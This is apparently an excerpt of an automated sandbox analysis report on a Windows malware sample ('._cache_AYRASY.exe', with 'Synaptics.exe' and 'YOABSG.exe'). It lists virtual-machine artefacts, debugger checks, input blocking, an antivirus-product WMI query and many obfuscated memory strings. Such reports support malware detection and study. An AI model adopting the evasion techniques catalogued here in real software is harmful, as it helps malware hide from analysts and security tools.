                                Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                                Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                                Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C703C BlockInput,2_2_001C703C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0017374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0017374E
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_001A46D0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_002E20D0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_002E20D0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0019A937 GetProcessHeap,2_2_0019A937
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00198E19 SetUnhandledExceptionFilter,2_2_00198E19
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00198E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00198E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D8E19 SetUnhandledExceptionFilter,9_2_009D8E19
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_009D8E3C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001ABE95 LogonUserW,2_2_001ABE95
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0017374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0017374E
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3412593994.0000000001446000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^wmi.execquery(select * from antivirusproduct);memstr_bf895f82-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2jmemstr_3c2463c1-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b2kv4rk7iu5kmemstr_b49c579c-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d8vw0fa6gmemstr_5bb2bd9f-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vmemstr_dab2e734-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i3lu1wa5zmemstr_50775688-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d8yw6wo4nn6tmemstr_1672cb53-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u8yy7rs5rc1comemstr_6c562173-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i3lu1wa5zfmemstr_d1d15c62-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i3lu1wa5zamemstr_202a37f5-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2j1c4vxmemstr_59203cc7-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vsmemstr_56f594d1-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u8yy7rs5rc1cememstr_33ff97d2-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i3lu1wa5z6t\memstr_c73471ed-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d8yw6wo4nn6twmemstr_a90633b1-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2j1c.memstr_6ffdc43e-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i3lu1wa5z5k)memstr_a5d089ea-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u8yy7rs5rc1c memstr_5e0c15ed-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w;memstr_92eeb600-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2j2memstr_d5035574-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u8qw3xh1fmemstr_8e0f1c7e-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u4ps5li7qu5mmemstr_5a4919a7-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u6xs5ti6zmemstr_aa9ba1df-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v9sn9ql6ij9hyu2yu7gr8mmemstr_c253fc15-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6du1gd4smemstr_06f34736-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405034j188405034memstr_64e12131-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d7de0rp8xmemstr_8b95b297-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4gn4jh0pmemstr_dcd6e600-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8uv3ry1i6zmemstr_2ac00dff-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v9sn9ql6ij9hqr6ch4fmemstr_64ed0582-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v9sn9ql6ij9hyu2yu7gr8mjmemstr_994b45fb-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8uv3ry1i4sememstr_209ede5b-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u8qw3xh1f|memstr_ecfb5b5a-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405034j188405035wmemstr_02cb4cf9-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405077j188405108nmemstr_6ac1c044-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u9ff9as0bimemstr_01283ce8-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8uv3ry1i@memstr_9a984167-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405077j188405108[memstr_b8003d77-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6du1gd4srmemstr_9b97b15d-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w8xm-memstr_2cf2341c-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405094j188405047?memstr_d0214b38-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b9yg3jv6rv9l6memstr_f48aa222-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f1xo2za0wc8o1memstr_16b10a06-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405035j188405091v9lmemstr_b53d3156-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405095j188405083memstr_f463f09f-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b9yg3jv6rv9lmemstr_402898d9-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f9vk4bx1qk1nmemstr_ae8f4748-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5uk0yu1o6rv9lmemstr_15b95336-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5uk0yu1omemstr_19d7ae6d-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b4qe2ec4smemstr_4dd54b9a-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b8be0eb6ed5wmemstr_0d435c1d-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405035j188405091memstr_84d1b5e2-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405095j1884050485wmemstr_e7ecd30d-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b8be0eb6ed5wnmemstr_6b198eff-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405095j188405048imemstr_3a11afce-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9cw2an8pus7og6rs7nj5y`memstr_cb638f4f-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b2kv4rk7iu5k{memstr_e4e603a5-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d7de0rp8xrmemstr_770176b0-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405035j188405091mmemstr_553b43f0-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f1xo2za0wc8odmemstr_8179c8dd-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b4qe2ec4s9l_memstr_2c8edfbe-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405035j188405091d5wvmemstr_77965edc-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b0bz5dg1cl1jqmemstr_15b4e56a-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b3pm7iq9wj5y(memstr_dc515d88-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d3ui1ji9st7j#memstr_c6a19fc6-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b8pb2bx2j:memstr_ae57bcc1-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5uk0yu1o5memstr_1e7a146a-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b3pm7iq9wj5ymemstr_38ce1b3a-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u8fg7cf9tq7wmemstr_cc5f3911-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9cw2an8pus7og6rs7nmemstr_04a65cc2-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d3ui1ji9st7jmemstr_f7d499b1-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405094j188405047memstr_33cd4534-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b0ys9gf9jmemstr_77badf8b-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5uk0yu1o9wj5ymemstr_91fc7a27-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9wmemstr_b1350449-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f9vk4bx1qk1n9lmemstr_fb9cfc7f-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b9yg3jv6rv9lmmemstr_825ec8b1-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f1xo2za0wc8odmemstr_fb70260c-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d3ui1ji9st7jvmemstr_52d19156-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b0bz5dg1cl1j7jqmemstr_55ddffba-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f6xm8dx6ss6h5khmemstr_9dbd7799-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b8be0eb6ed5wcmemstr_ddbe6f5d-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b0ys9gf9j7jzmemstr_5771f26a-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405035j188405091,memstr_c78f9d2e-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405035j188405091'memstr_52fa2c0a-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s4gf0ps7b0bz5dg1cl1j>memstr_2a6d28c7-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d3ui1ji9st7j9memstr_96e72947-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b3pm7iq9wj5y0memstr_afe7401e-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f1xo2za0wc8omemstr_f2b6f57f-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u3vh1ra2fmemstr_35c43efc-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f6xm8dx6ss6hhmemstr_8fd27a29-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u3vh1ra2fcmemstr_27e3b4fd-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u3vh1ra2f1vzmemstr_9a540491-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1yc8yb9qc1vumemstr_76ac4095-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1yc8yb9qc1vgmemstr_9638aba3-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1yc8yb9qc1v^memstr_4b0407b3-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i3lu1wa5zymemstr_4a9c3358-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e3gw0mn6cg4i3lu1wa5zpmemstr_827bae13-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u3vh1ra2f+memstr_8478844c-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f6xm8dx6ss6h"memstr_63046563-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u3vh1ra2f1v=memstr_0e523928-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1yc8yb9qc1v4memstr_b73afe27-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u3vh1ra2f5zmemstr_be7ce4d8-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f6xm8dx6ss6hmemstr_f8b62253-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g6ll0mz2xd8wmemstr_e7e267b4-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d4vt8bo4dw2ememstr_be00b066-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f9bp7re7uz5jmemstr_3d39a41b-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b8xm3wv3ch8qmemstr_f632f466-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2h2xd8wlmemstr_3b563a6b-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2hgmemstr_fcce2dc6-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g6ll0mz2xd8wymemstr_9499442c-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2h4dw2epmemstr_640cec16-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mq1xs3or6b8xm3wv3ch8qkmemstr_4263e281-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w5jbmemstr_642bd541-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g6ll0mz2xd8w]memstr_4445ae30-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g6ll0mz2xd8wtmemstr_7c454cb3-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f9bp7re7uz5j8w/memstr_7697d3eb-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g0dd2df3f9bp7re7uz5j!memstr_a9dfab06-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6g6ll0mz2xd8w8memstr_734509d5-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2h4dw2e3memstr_53fa22aa-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1ql7cn9w2xd8wmemstr_dbda75e3-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u1yc8yb9qc1vmemstr_35e1cf87-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2hmemstr_d9b5dc57-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u5oh9vd4lg4xmemstr_e9d1526b-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d0jj9wj2sx5xmemstr_a2b56927-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5zq7er7zz5t5xmemstr_515c6b1e-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u8yy7rs5rc1cmemstr_51e3e1f8-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l6hm3aj4fx2d6vk9ij3sk4vkmemstr_4342b25e-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u3ln6ei5n}memstr_f54a21e3-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u4fa4dt2homemstr_9a001174-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u3ln6ei5nfmemstr_c91ce69f-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0xt2ey8sh8u3ln6ei5namemstr_4c89b0cc-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0fx5js0u5oa0il8dv6xxmemstr_11c0100d-4
